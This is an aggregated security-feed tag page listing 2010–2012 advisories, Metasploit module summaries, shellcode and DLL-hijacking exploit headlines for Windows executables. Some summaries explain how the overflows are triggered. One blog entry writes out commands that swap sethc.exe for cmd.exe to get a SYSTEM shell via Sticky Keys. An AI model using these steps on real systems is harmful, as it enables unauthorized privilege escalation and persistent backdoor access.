jetlib.sec » Tags » exe

Feeds

133360 items (0 unread) in 27 feeds

• 1337day (was: Inj3ct0r, 1337db)
• OSVDB Vulnerabilities
• Exploit-DB
• SecurityFocus Vulnerabilities
• Bugtraq
• Full Disclosure
• XSSed
• Packet Storm Security Headlines
• Packet Storm Security Advisories
• Packet Storm Security Exploits
• Packet Storm Security Recent Files
• Packet Storm Security Tools
• Packet Storm Security Misc. Files
• Sophos security news
• Sophos product advisories
• Penetration Testing
• SecuriTeam
• BackTrack Linux Forums
• Threatpost
• SecDocs
• carnal0wnage.attackresearch.com
• Carnal0wnage
• Kernel Fun
• Darknet
• The Exploitant
• Hack a Day
• Wirevolution

99 items tagged "exe"

Related tags: calc [+], buffer overflow [+], zero day [+], win [+], txt [+], cmd [+], win32 [+], overflow [+], arbitrary code execution [+], shellcode [+], hp openview nnm [+], getnnmdata [+], dll [+], provisioning services [+], provisioning [+], hijacking [+], citrix [+], mediacoder [+], hp network [+], snmpviewer [+], server [+], proof of concept [+], payload [+], oracle [+], nnmrptconfig [+], nnm [+], microsoft excel [+], microsoft [+], magentservice [+], local buffer overflow [+], ita [+], initial approach [+], igss [+], hp openview [+], exp [+], data server [+], data [+], cgi bugs [+], alpha [+], websense [+], system [+], sacl [+], protected [+], process [+], novell groupwise [+], meterpreter [+], metasploit [+], message transfer [+], icacls [+], http [+], harir [+], firefox [+], english [+], dll module [+], dacl [+], command line arguments [+], buffer overflow vulnerability [+], arbitrary code [+], Pentesting [+], vulnerability [+], network node manager [+], xwine [+], xp sp2 [+], winstyler [+], winexec [+], vrn [+], twincat [+], trojan w32 [+], trojan horse [+], trojan [+], triton [+], tcatsyssrv [+], tags [+], system shell [+], system options [+], sticky keys [+], soliddb [+], slides [+], shikata ga nai [+], sethc [+], service vulnerability [+], sap [+], russia with love [+], russia [+], raw ruby [+], program [+], powerdvd [+], player [+], planting [+], param [+], opcode [+], omniinet [+], notepad [+], netbiterconfig [+], multiple [+], msfencode [+], module search [+], maxdb [+], manipulatio [+], malaysia [+], love [+], linux distro [+], linux [+], lhasa [+], kingview [+], intellicom [+], impersonation [+], ibm [+], hotness [+], horse trojan [+], historyserver [+], heap [+], handshake [+], hack in the box [+], flash player 9 [+], file sizes [+], file [+], factorylink [+], explorer [+], executable [+], exe packer [+], exe files [+], denial of service [+], crash [+], collection [+], binary [+], authority [+], authentication [+], Newbie [+], Area [+], xp sp3 [+], stack buffer [+], buffer [+], exploits [+], based buffer overflow [+], code execution [+], code [+], manager. authentication [+]

• May 13, 2012
• 4:11

  ICACLS.EXE Destroys SE_DACL_PROTECTED/SE_SACL_PROTECTED

   » ‎ Packet Storm Security Advisories
  ICACLS.EXE ignores and destroys SE_DACL_PROTECTED/SE_SACL_PROTECTED.

  Tags:  exe protected icacls sacl dacl  

• 4:11

  ICACLS.EXE Destroys SE_DACL_PROTECTED/SE_SACL_PROTECTED

   » ‎ Packet Storm Security Misc. Files
  ICACLS.EXE ignores and destroys SE_DACL_PROTECTED/SE_SACL_PROTECTED.

  Tags:  exe protected icacls sacl dacl  

• May 02, 2012
• 0:00

  Vuln: Websense Triton 'favorites.exe' HTML Injection Vulnerability

   » ‎ SecurityFocus Vulnerabilities
  Websense Triton 'favorites.exe' HTML Injection Vulnerability

  Tags:  exe websense triton vulnerability  

• 0:00

  Vuln: Multiple Websense Products 'favorites.exe' Authentication Bypass Vulnerability

   » ‎ SecurityFocus Vulnerabilities
  Multiple Websense Products 'favorites.exe' Authentication Bypass Vulnerability

  Tags:  exe multiple websense vulnerability authentication  

• April 30, 2012
• 9:10

  Privilege Escalation via "Sticky" Keys

   » ‎ Carnal0wnage
  This has been documented all over, but i like things to be on the blog so i can find them...
  
  You can gain a SYSTEM shell on an application you have administrative access on  or if you have physical access to the box and can boot to repair disk or linux distro and can change files.
  
  make a copy somewhere of the original on system sethc.exe
  
  copy c:\windows\system32\sethc.exe c:\
  
  
  cp /mnt/sda3/Windows/System32/sethc.exe /mnt/sda3/sethc.exe
  
  
  copy cmd.exe into sethc.exe's place
  
  
  copy /y c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe
  
  
  or
  
  
  cp /mnt/sda3/Windows/System32/cmd.exe /mnt/sda3/Windows/System32/sethc.exe
  
  
  Reboot, hit Shift key 5 times, SYSTEM shell will pop up, do your thing
  
  
  
  
  
  
  it would probably be nice to sethc.exe back when you are done.

  Tags:  exe sethc system linux-distro system-shell sticky-keys Pentesting  

• January 27, 2012
• 16:46

  HP Diagnostics Server magentservice.exe Overflow

   » ‎ Packet Storm Security Exploits
  This Metasploit module exploits a stack buffer overflow in HP Diagnostics Server magentservice.exe service. By sending a specially crafted packet, an attacker may be able to execute arbitrary code. Originally found and posted by AbdulAziz Harir via ZDI.

  Tags:  exe server magentservice stack-buffer buffer-overflow harir  

• 16:46

  HP Diagnostics Server magentservice.exe Overflow

   » ‎ Packet Storm Security Recent Files
  This Metasploit module exploits a stack buffer overflow in HP Diagnostics Server magentservice.exe service. By sending a specially crafted packet, an attacker may be able to execute arbitrary code. Originally found and posted by AbdulAziz Harir via ZDI.

  Tags:  exe server magentservice stack-buffer buffer-overflow harir  

• 14:00

  [remote exploits] - HP Diagnostics Server magentservice.exe Overflow

   » ‎ 1337day (was: Inj3ct0r, 1337db)
  [remote exploits] - HP Diagnostics Server magentservice.exe Overflow

  Tags:  exe server magentservice overflow exploits  

• January 10, 2012
• 13:00

  Bugtraq: ZDI-12-008 : Citrix Provisioning Services streamprocess.exe vDisk Name Parsing Remote Code Execution Vulnerability

   » ‎ SecurityFocus Vulnerabilities
  ZDI-12-008 : Citrix Provisioning Services streamprocess.exe vDisk Name Parsing Remote Code Execution Vulnerability

  Tags:  exe citrix provisioning code-execution provisioning-services  

• 0:00

  Vuln: Citrix Provisioning Services 'streamprocess.exe' Component Remote Code Execution Vulnerability

   » ‎ SecurityFocus Vulnerabilities
  Citrix Provisioning Services 'streamprocess.exe' Component Remote Code Execution Vulnerability

  Tags:  exe citrix provisioning code-execution provisioning-services  

• December 22, 2011
• 0:00

  Vuln: KingView 'HistoryServer.exe' Heap Based Buffer Overflow Vulnerability

   » ‎ SecurityFocus Vulnerabilities
  KingView 'HistoryServer.exe' Heap Based Buffer Overflow Vulnerability

  Tags:  exe kingview historyserver buffer-overflow-vulnerability based-buffer-overflow heap  

• October 11, 2011
• 0:00

  Vuln: TwinCAT 'TCATSysSrv.exe' Network Packet Denial of Service Vulnerability

   » ‎ SecurityFocus Vulnerabilities
  TwinCAT 'TCATSysSrv.exe' Network Packet Denial of Service Vulnerability

  Tags:  exe tcatsyssrv twincat service-vulnerability denial-of-service  

• June 30, 2011
• 21:00

  [remote exploits] - HP OmniInet.exe Opcode 27 Buffer Overflow

   » ‎ 1337day (was: Inj3ct0r, 1337db)
  [remote exploits] - HP OmniInet.exe Opcode 27 Buffer Overflow

  Tags:  exe opcode omniinet buffer-overflow exploits  

• June 28, 2011
• 0:00

  Vuln: Citrix Provisioning Services 'streamprocess.exe' Component Remote Code Execution Vulnerability

   » ‎ SecurityFocus Vulnerabilities
  Citrix Provisioning Services 'streamprocess.exe' Component Remote Code Execution Vulnerability

  Tags:  exe citrix provisioning code-execution provisioning-services  

• June 26, 2011
• 21:00

  [remote exploits] - Citrix Provisioning Services 5.6 streamprocess.exe Buffer Overflow

   » ‎ 1337day (was: Inj3ct0r, 1337db)
  [remote exploits] - Citrix Provisioning Services 5.6 streamprocess.exe Buffer Overflow

  Tags:  exe citrix provisioning buffer-overflow provisioning-services exploits  

• June 20, 2011
• 21:00

  [remote exploits] - FactoryLink vrn.exe Opcode 9 Buffer Overflow

   » ‎ 1337day (was: Inj3ct0r, 1337db)
  [remote exploits] - FactoryLink vrn.exe Opcode 9 Buffer Overflow

  Tags:  exe vrn factorylink buffer-overflow exploits  

• May 31, 2011
• 6:29

  7-Technologies IGSS 9 Data Server/Collector Packet Handling

   » ‎ Packet Storm Security Exploits
  This Metasploit module exploits multiple vulnerabilities found on IGSS 9's Data Server and Data Collector services. The initial approach is first by transferring our binary with Write packets (opcode 0x0D) via port 12401 (igssdataserver.exe), and then sending an EXE packet (opcode 0x0A) to port 12397 (dc.exe), which will cause dc.exe to run that payload with a CreateProcessA() function as a new thread.

  Tags:  exe igss data data-server initial-approach payload  

• 6:29

  7-Technologies IGSS 9 Data Server/Collector Packet Handling

   » ‎ Packet Storm Security Recent Files
  This Metasploit module exploits multiple vulnerabilities found on IGSS 9's Data Server and Data Collector services. The initial approach is first by transferring our binary with Write packets (opcode 0x0D) via port 12401 (igssdataserver.exe), and then sending an EXE packet (opcode 0x0A) to port 12397 (dc.exe), which will cause dc.exe to run that payload with a CreateProcessA() function as a new thread.

  Tags:  exe igss data data-server initial-approach payload  

• 6:29

  7-Technologies IGSS 9 Data Server/Collector Packet Handling

   » ‎ Packet Storm Security Misc. Files
  This Metasploit module exploits multiple vulnerabilities found on IGSS 9's Data Server and Data Collector services. The initial approach is first by transferring our binary with Write packets (opcode 0x0D) via port 12401 (igssdataserver.exe), and then sending an EXE packet (opcode 0x0A) to port 12397 (dc.exe), which will cause dc.exe to run that payload with a CreateProcessA() function as a new thread.

  Tags:  exe igss data data-server initial-approach payload  

• May 02, 2011
• 21:00

  [win32] - win32/xp sp3 cmd.exe Shellcode 50 bytes

   » ‎ 1337day (was: Inj3ct0r, 1337db)
  [win32] - win32/xp sp3 cmd.exe Shellcode 50 bytes

  Tags:  exe win cmd  

• 16:44

  Win32/XP SP3 cmd.exe Shellcode

   » ‎ Packet Storm Security Recent Files
  50 bytes small Win32/XP SP3 cmd.exe shellcode.

  Tags:  exe win cmd xp-sp3  

• 16:44

  Win32/XP SP3 cmd.exe Shellcode

   » ‎ Packet Storm Security Misc. Files
  50 bytes small Win32/XP SP3 cmd.exe shellcode.

  Tags:  exe win cmd xp-sp3  

• 14:00

  [win32] - win32/xp sp3 cmd.exe Shellcode 50 bytes

   » ‎ 1337day (was: Inj3ct0r, 1337db)
  [win32] - win32/xp sp3 cmd.exe Shellcode 50 bytes

  Tags:  exe win cmd  

• March 23, 2011
• 17:06

  HP OpenView Network Node Manager ovwebsnmpsrv.exe Unrecognized Option Buffer Overflow

   » ‎ Packet Storm Security Exploits
  This Metasploit module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 prior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe' CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. The vulnerable code is within the option parsing function within "ovwebsnmpsrv.exe" with a timestamp prior to April 7th, 2010. Reaching the vulnerable code requires a 'POST' request with an 'arg' parameter that, when combined with a some static text, exceeds 10240 bytes. The parameter must begin with a dash. It is important to note that this vulnerability must be exploited by overwriting SEH. This is since overflowing the buffer with controllable data always triggers an access violation when attempting to write static text beyond the end of the stack. Exploiting this issue is a bit tricky due to a restrictive character set. In order to accomplish arbitrary code execution, a double-backward jump is used in combination with the Alpha2 encoder.

  Tags:  exe code buffer alpha arbitrary-code-execution network-node-manager based-buffer-overflow  

• 17:06

  HP OpenView Network Node Manager ovwebsnmpsrv.exe Unrecognized Option Buffer Overflow

   » ‎ Packet Storm Security Recent Files
  This Metasploit module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 prior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe' CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. The vulnerable code is within the option parsing function within "ovwebsnmpsrv.exe" with a timestamp prior to April 7th, 2010. Reaching the vulnerable code requires a 'POST' request with an 'arg' parameter that, when combined with a some static text, exceeds 10240 bytes. The parameter must begin with a dash. It is important to note that this vulnerability must be exploited by overwriting SEH. This is since overflowing the buffer with controllable data always triggers an access violation when attempting to write static text beyond the end of the stack. Exploiting this issue is a bit tricky due to a restrictive character set. In order to accomplish arbitrary code execution, a double-backward jump is used in combination with the Alpha2 encoder.

  Tags:  exe code buffer alpha arbitrary-code-execution network-node-manager based-buffer-overflow  

• 17:06

  HP OpenView Network Node Manager ovwebsnmpsrv.exe Unrecognized Option Buffer Overflow

   » ‎ Packet Storm Security Misc. Files
  This Metasploit module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 prior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe' CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. The vulnerable code is within the option parsing function within "ovwebsnmpsrv.exe" with a timestamp prior to April 7th, 2010. Reaching the vulnerable code requires a 'POST' request with an 'arg' parameter that, when combined with a some static text, exceeds 10240 bytes. The parameter must begin with a dash. It is important to note that this vulnerability must be exploited by overwriting SEH. This is since overflowing the buffer with controllable data always triggers an access violation when attempting to write static text beyond the end of the stack. Exploiting this issue is a bit tricky due to a restrictive character set. In order to accomplish arbitrary code execution, a double-backward jump is used in combination with the Alpha2 encoder.

  Tags:  exe code buffer alpha arbitrary-code-execution network-node-manager based-buffer-overflow  

• 17:05

  HP OpenView Network Node Manager ovwebsnmpsrv.exe ovutil Buffer Overflow

   » ‎ Packet Storm Security Exploits
  This Metasploit module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 prior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe' CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. This vulnerability is triggerable via either a GET or POST request. It is interesting to note that this vulnerability cannot be exploited by overwriting SEH, since attempting to would trigger CVE-2010-1964. The vulnerable code is within a sub-function called from "main" within "ovwebsnmpsrv.exe" with a timestamp prior to April 7th, 2010. This function contains a 256 byte stack buffer which is passed to the "getProxiedStorageAddress" function within ovutil.dll. When processing the address results in an error, the buffer is overflowed in a call to sprintf_new. There are no stack cookies present, so exploitation is easily achieved by overwriting the saved return address. There exists some unreliability when running this exploit. It is not completely clear why at this time, but may be related to OVWDB or session management. Also, on some attempts OV NNM may report invalid characters in the URL. It is not clear what is causing this either.

  Tags:  exe buffer overflow network-node-manager based-buffer-overflow stack-buffer  

• 17:05

  HP OpenView Network Node Manager ovwebsnmpsrv.exe ovutil Buffer Overflow

   » ‎ Packet Storm Security Recent Files
  This Metasploit module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 prior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe' CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. This vulnerability is triggerable via either a GET or POST request. It is interesting to note that this vulnerability cannot be exploited by overwriting SEH, since attempting to would trigger CVE-2010-1964. The vulnerable code is within a sub-function called from "main" within "ovwebsnmpsrv.exe" with a timestamp prior to April 7th, 2010. This function contains a 256 byte stack buffer which is passed to the "getProxiedStorageAddress" function within ovutil.dll. When processing the address results in an error, the buffer is overflowed in a call to sprintf_new. There are no stack cookies present, so exploitation is easily achieved by overwriting the saved return address. There exists some unreliability when running this exploit. It is not completely clear why at this time, but may be related to OVWDB or session management. Also, on some attempts OV NNM may report invalid characters in the URL. It is not clear what is causing this either.

  Tags:  exe buffer overflow network-node-manager based-buffer-overflow stack-buffer  

• 17:05

  HP OpenView Network Node Manager ovwebsnmpsrv.exe ovutil Buffer Overflow

   » ‎ Packet Storm Security Misc. Files
  This Metasploit module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 prior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe' CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. This vulnerability is triggerable via either a GET or POST request. It is interesting to note that this vulnerability cannot be exploited by overwriting SEH, since attempting to would trigger CVE-2010-1964. The vulnerable code is within a sub-function called from "main" within "ovwebsnmpsrv.exe" with a timestamp prior to April 7th, 2010. This function contains a 256 byte stack buffer which is passed to the "getProxiedStorageAddress" function within ovutil.dll. When processing the address results in an error, the buffer is overflowed in a call to sprintf_new. There are no stack cookies present, so exploitation is easily achieved by overwriting the saved return address. There exists some unreliability when running this exploit. It is not completely clear why at this time, but may be related to OVWDB or session management. Also, on some attempts OV NNM may report invalid characters in the URL. It is not clear what is causing this either.

  Tags:  exe buffer overflow network-node-manager based-buffer-overflow stack-buffer  

• 17:03

  HP OpenView Network Node Manager ovwebsnmpsrv.exe main Buffer Overflow

   » ‎ Packet Storm Security Exploits
  This Metasploit module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 prior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe' CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. This vulnerability is triggerable via either a GET or POST request. The buffer being written to is 1024 bytes in size. It is important to note that this vulnerability must be exploited by overwriting SEH. Otherwise, CVE-2010-1961 is triggered! The vulnerable code is within the "main" function within "ovwebsnmpsrv.exe" with a timestamp prior to April 7th, 2010. There are no stack cookies, so exploitation is easily achieved by overwriting SEH structures. There exists some unreliability when running this exploit. It is not completely clear why at this time, but may be related to OVWDB or session management. Also, on some attempts OV NNM may report invalid characters in the URL. It is not clear what is causing this either.

  Tags:  exe buffer overflow network-node-manager based-buffer-overflow stack-buffer  

• 17:03

  HP OpenView Network Node Manager ovwebsnmpsrv.exe main Buffer Overflow

   » ‎ Packet Storm Security Recent Files
  This Metasploit module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 prior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe' CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. This vulnerability is triggerable via either a GET or POST request. The buffer being written to is 1024 bytes in size. It is important to note that this vulnerability must be exploited by overwriting SEH. Otherwise, CVE-2010-1961 is triggered! The vulnerable code is within the "main" function within "ovwebsnmpsrv.exe" with a timestamp prior to April 7th, 2010. There are no stack cookies, so exploitation is easily achieved by overwriting SEH structures. There exists some unreliability when running this exploit. It is not completely clear why at this time, but may be related to OVWDB or session management. Also, on some attempts OV NNM may report invalid characters in the URL. It is not clear what is causing this either.

  Tags:  exe buffer overflow network-node-manager based-buffer-overflow stack-buffer  

• 17:03

  HP OpenView Network Node Manager ovwebsnmpsrv.exe main Buffer Overflow

   » ‎ Packet Storm Security Misc. Files
  This Metasploit module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 prior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe' CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. This vulnerability is triggerable via either a GET or POST request. The buffer being written to is 1024 bytes in size. It is important to note that this vulnerability must be exploited by overwriting SEH. Otherwise, CVE-2010-1961 is triggered! The vulnerable code is within the "main" function within "ovwebsnmpsrv.exe" with a timestamp prior to April 7th, 2010. There are no stack cookies, so exploitation is easily achieved by overwriting SEH structures. There exists some unreliability when running this exploit. It is not completely clear why at this time, but may be related to OVWDB or session management. Also, on some attempts OV NNM may report invalid characters in the URL. It is not clear what is causing this either.

  Tags:  exe buffer overflow network-node-manager based-buffer-overflow stack-buffer  

• 17:02

  HP OpenView NNM nnmRptConfig.exe schdParams Buffer Overflow

   » ‎ Packet Storm Security Exploits
  This Metasploit module exploits NNM's nnmRptConfig.exe. Similar to other NNM CGI bugs, the overflow occurs during a ov.sprintf_new() call, which allows an attacker to overwrite data on the stack, and gain arbitrary code execution.

  Tags:  exe nnm nnmrptconfig arbitrary-code-execution hp-openview cgi-bugs  

• 17:02

  HP OpenView NNM nnmRptConfig.exe schdParams Buffer Overflow

   » ‎ Packet Storm Security Recent Files
  This Metasploit module exploits NNM's nnmRptConfig.exe. Similar to other NNM CGI bugs, the overflow occurs during a ov.sprintf_new() call, which allows an attacker to overwrite data on the stack, and gain arbitrary code execution.

  Tags:  exe nnm nnmrptconfig arbitrary-code-execution hp-openview cgi-bugs  

• 17:02

  HP OpenView NNM nnmRptConfig.exe schdParams Buffer Overflow

   » ‎ Packet Storm Security Misc. Files
  This Metasploit module exploits NNM's nnmRptConfig.exe. Similar to other NNM CGI bugs, the overflow occurs during a ov.sprintf_new() call, which allows an attacker to overwrite data on the stack, and gain arbitrary code execution.

  Tags:  exe nnm nnmrptconfig arbitrary-code-execution hp-openview cgi-bugs  

• 17:00

  HP OpenView Network Node Manager snmpviewer.exe Buffer Overflow

   » ‎ Packet Storm Security Exploits
  This Metasploit module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 prior to NNM_01203. By making a specially crafted HTTP request to the "snmpviewer.exe" CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. The vulnerable code lies within the a function within "snmpviewer.exe" with a timestamp prior to April 7th, 2010. This vulnerability is triggerable via either a GET or POST request. The request must contain 'act' and 'app' parameters which, when combined, total more than the 1024 byte stack buffer can hold.

  Tags:  exe buffer snmpviewer network-node-manager based-buffer-overflow stack-buffer  

• 17:00

  HP OpenView Network Node Manager snmpviewer.exe Buffer Overflow

   » ‎ Packet Storm Security Recent Files
  This Metasploit module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 prior to NNM_01203. By making a specially crafted HTTP request to the "snmpviewer.exe" CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. The vulnerable code lies within the a function within "snmpviewer.exe" with a timestamp prior to April 7th, 2010. This vulnerability is triggerable via either a GET or POST request. The request must contain 'act' and 'app' parameters which, when combined, total more than the 1024 byte stack buffer can hold.

  Tags:  exe buffer snmpviewer network-node-manager based-buffer-overflow stack-buffer  

• 17:00

  HP OpenView Network Node Manager snmpviewer.exe Buffer Overflow

   » ‎ Packet Storm Security Misc. Files
  This Metasploit module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 prior to NNM_01203. By making a specially crafted HTTP request to the "snmpviewer.exe" CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. The vulnerable code lies within the a function within "snmpviewer.exe" with a timestamp prior to April 7th, 2010. This vulnerability is triggerable via either a GET or POST request. The request must contain 'act' and 'app' parameters which, when combined, total more than the 1024 byte stack buffer can hold.

  Tags:  exe buffer snmpviewer network-node-manager based-buffer-overflow stack-buffer  

• February 15, 2011
• 7:40

  Oracle 10/11g exp.exe Buffer Overflow

   » ‎ Packet Storm Security Exploits
  Oracle 10/11g exp.exe param file local buffer overflow proof of concept exploit.

  Tags:  exe param exp local-buffer-overflow proof-of-concept oracle  

• 7:40

  Oracle 10/11g exp.exe Buffer Overflow

   » ‎ Packet Storm Security Recent Files
  Oracle 10/11g exp.exe param file local buffer overflow proof of concept exploit.

  Tags:  exe oracle exp local-buffer-overflow proof-of-concept  

• 7:40

  Oracle 10/11g exp.exe Buffer Overflow

   » ‎ Packet Storm Security Misc. Files
  Oracle 10/11g exp.exe param file local buffer overflow proof of concept exploit.

  Tags:  exe oracle exp local-buffer-overflow proof-of-concept  

• January 20, 2011
• 0:00

  Vuln: Citrix Provisioning Services 'streamprocess.exe' Component Remote Code Execution Vulnerability

   » ‎ SecurityFocus Vulnerabilities
  Citrix Provisioning Services 'streamprocess.exe' Component Remote Code Execution Vulnerability

  Tags:  exe citrix provisioning code-execution provisioning-services  

• December 24, 2010
• 14:00

  [local exploits] - MediaCoder-0.7.5.4798.exe 0-days Buffer Overflow

   » ‎ 1337day (was: Inj3ct0r, 1337db)
  [local exploits] - MediaCoder-0.7.5.4798.exe 0-days Buffer Overflow

  Tags:  exe buffer mediacoder buffer-overflow exploits  

• December 06, 2010
• 14:00

  [local exploits] - MediaCoder-0.7.5.4797.exe 0-days Buffer Overflow Exploit(SEH)

   » ‎ 1337day (was: Inj3ct0r, 1337db)
  [local exploits] - MediaCoder-0.7.5.4797.exe 0-days Buffer Overflow Exploit(SEH)

  Tags:  exe buffer mediacoder buffer-overflow exploits  

• December 04, 2010
• 14:00

  [local exploits] - MediaCoder-0.7.5.4796.exe 0-days Buffer Overflow (SEH)

   » ‎ 1337day (was: Inj3ct0r, 1337db)
  [local exploits] - MediaCoder-0.7.5.4796.exe 0-days Buffer Overflow (SEH)

  Tags:  exe buffer mediacoder buffer-overflow exploits  

• December 02, 2010
• 14:00

  [local exploits] - MediaCoder-0.7.5.4795.exe 0-days Buffer Overflow (SEH)

   » ‎ 1337day (was: Inj3ct0r, 1337db)
  [local exploits] - MediaCoder-0.7.5.4795.exe 0-days Buffer Overflow (SEH)

  Tags:  exe buffer mediacoder buffer-overflow exploits  

• November 09, 2010
• 22:02

  ZDI-10-247.txt

   » ‎ Packet Storm Security Recent Files
  Zero Day Initiative Advisory 10-247 - This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Novell Groupwise. Authentication is not required to exploit this vulnerability. The specific flaw exists in a function responsible for assembling an HTTP response. The following modules implement this functionality: gwpoa.exe, gwmta.exe, gwia.exe. When responding to an HTTP request sent to TCP port 7101 or 7100 or in the case of gwia.exe the user configured Message Transfer Port , the process uses the client-specified Host: header to create an HTTP 301 redirection message. Within this code a local stack buffer is used to store the redirect location and can be overflown with a sufficiently long header value. A remote attacker can exploit this vulnerability to execute arbitrary code under the context of the SYSTEM user.

  Tags:  exe vulnerability http novell-groupwise stack-buffer message-transfer  

• 22:01

  ZDI-10-247.txt

   » ‎ Packet Storm Security Advisories
  Zero Day Initiative Advisory 10-247 - This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Novell Groupwise. Authentication is not required to exploit this vulnerability. The specific flaw exists in a function responsible for assembling an HTTP response. The following modules implement this functionality: gwpoa.exe, gwmta.exe, gwia.exe. When responding to an HTTP request sent to TCP port 7101 or 7100 or in the case of gwia.exe the user configured Message Transfer Port , the process uses the client-specified Host: header to create an HTTP 301 redirection message. Within this code a local stack buffer is used to store the redirect location and can be overflown with a sufficiently long header value. A remote attacker can exploit this vulnerability to execute arbitrary code under the context of the SYSTEM user.

  Tags:  exe vulnerability http novell-groupwise stack-buffer message-transfer  

• October 27, 2010
• 14:00

  [local exploits] - Microsoft excel.exe 2010 DLL Hijacking Exploit

   » ‎ 1337day (was: Inj3ct0r, 1337db)
  [local exploits] - Microsoft excel.exe 2010 DLL Hijacking Exploit

  Tags:  exe microsoft dll microsoft-excel hijacking exploits  

• 14:00

  [local exploits] - Microsoft excel.exe 2007 DLL Hijacking Exploit

   » ‎ 1337day (was: Inj3ct0r, 1337db)
  [local exploits] - Microsoft excel.exe 2007 DLL Hijacking Exploit

  Tags:  exe microsoft dll microsoft-excel hijacking exploits  

• 14:00

  [local exploits] - Microsoft excel.exe 2003 DLL Hijacking Exploit

   » ‎ 1337day (was: Inj3ct0r, 1337db)
  [local exploits] - Microsoft excel.exe 2003 DLL Hijacking Exploit

  Tags:  exe microsoft dll microsoft-excel hijacking exploits  

• October 22, 2010
• 14:00

  [local exploits] - PowerDVD.exe 5.00.1107 DLL Hijacking Exploit

   » ‎ 1337day (was: Inj3ct0r, 1337db)
  [local exploits] - PowerDVD.exe 5.00.1107 DLL Hijacking Exploit

  Tags:  exe powerdvd dll hijacking exploits  

• October 12, 2010
• 0:00

  Vuln: Lhasa 'explorer.exe' Executable Loading Arbitrary Code Execution Vulnerability

   » ‎ SecurityFocus Vulnerabilities
  Lhasa 'explorer.exe' Executable Loading Arbitrary Code Execution Vulnerability

  Tags:  exe executable explorer lhasa arbitrary-code-execution vulnerability  

• October 01, 2010
• 14:00

  [win32] - win32/xp sp3 (Tr) cmd.exe Shellcode 42 bytes

   » ‎ 1337day (was: Inj3ct0r, 1337db)
  [win32] - win32/xp sp3 (Tr) cmd.exe Shellcode 42 bytes

  Tags:  exe win cmd xp-sp3 win32  

• September 27, 2010
• 14:00

  [local exploits] - winstyler (winstyler.exe) DLL Hijacking Exploit

   » ‎ 1337day (was: Inj3ct0r, 1337db)
  [local exploits] - winstyler (winstyler.exe) DLL Hijacking Exploit

  Tags:  exe dll winstyler exploits  

• September 20, 2010
• 19:01

  firefox-shellcode.txt

   » ‎ Packet Storm Security Misc. Files
  75 bytes small firefox.exe shellcode for Win32/XP SP3.

  Tags:  exe txt firefox shellcode xp-sp3  

• 19:01

  xpnotepad-shellcode.txt

   » ‎ Packet Storm Security Misc. Files
  87 bytes small edit with notepad.exe shellcode for Win32/XP SP3.

  Tags:  exe txt notepad shellcode xp-sp3  

• September 19, 2010
• 14:00

  [win32] - win32/xp sp3 (Tr) firefox.exe Shellcode 75 bytes

   » ‎ 1337day (was: Inj3ct0r, 1337db)
  [win32] - win32/xp sp3 (Tr) firefox.exe Shellcode 75 bytes

  Tags:  exe win firefox xp-sp3 win32  

• September 18, 2010
• 4:13

  [Slides] From Russia with love.exe

   » ‎ SecDocs
  Tags: malware cybercrime
  Event: Hack In The Box 2009 Malaysia
  

  Tags:  exe tags love russia malaysia hack-in-the-box slides russia-with-love  

• September 15, 2010
• 15:45

  win32/xp sp3 (Tr) calc.exe Shellcode 53 bytes

   » ‎ 1337day (was: Inj3ct0r, 1337db)
  win32/xp sp3 (Tr) calc.exe Shellcode 53 bytes

  Tags:  exe shellcode calc xp-sp3  

• 14:00

  [win32] - win32/xp sp3 (Tr) calc.exe Shellcode 53 bytes

   » ‎ 1337day (was: Inj3ct0r, 1337db)
  [win32] - win32/xp sp3 (Tr) calc.exe Shellcode 53 bytes

  Tags:  exe win calc xp-sp3 win32  

• 14:00

  [win32] - win32/xp sp3 (Tr) cmd.exe Shellcode 52 bytes

   » ‎ 1337day (was: Inj3ct0r, 1337db)
  [win32] - win32/xp sp3 (Tr) cmd.exe Shellcode 52 bytes

  Tags:  exe win cmd xp-sp3 win32  

• 12:37

  win32/xp sp3 (Tr) cmd.exe Shellcode 52 bytes

   » ‎ 1337day (was: Inj3ct0r, 1337db)
  win32/xp sp3 (Tr) cmd.exe Shellcode 52 bytes

  Tags:  exe shellcode cmd xp-sp3 win32  

• 0:00

  Vuln: IBM SolidDB 'solid.exe' Handshake Remote Code Execution Vulnerability

   » ‎ SecurityFocus Vulnerabilities
  IBM SolidDB 'solid.exe' Handshake Remote Code Execution Vulnerability

  Tags:  exe soliddb ibm code-execution handshake vulnerability  

• September 10, 2010
• 9:00

  Bugtraq: Re: Binary Planting Goes "EXE"

